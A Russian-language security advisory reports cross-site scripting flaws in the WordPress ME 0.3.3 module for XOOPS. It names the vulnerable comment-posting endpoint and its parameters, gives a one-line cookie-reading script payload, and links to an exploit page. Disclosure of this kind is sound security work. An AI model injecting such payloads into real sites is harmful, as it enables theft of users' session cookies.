Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в
плагине WordPress ME для XOOPS.
XSS:
POST запрос на странице
http://site/modules/wordpress/wp-comments-post.php
"><script>alert(document.cookie)</script>
В параметрах: author, comment, private_key и back.
Эксплоит:
http://websecurity.com.ua/uploads/2008/WordPress%20ME%20for%20XOOPS%20XSS.html
Уязвима версия WordPress ME 0.3.3 module for XOOPS и предыдущие
версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2202/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua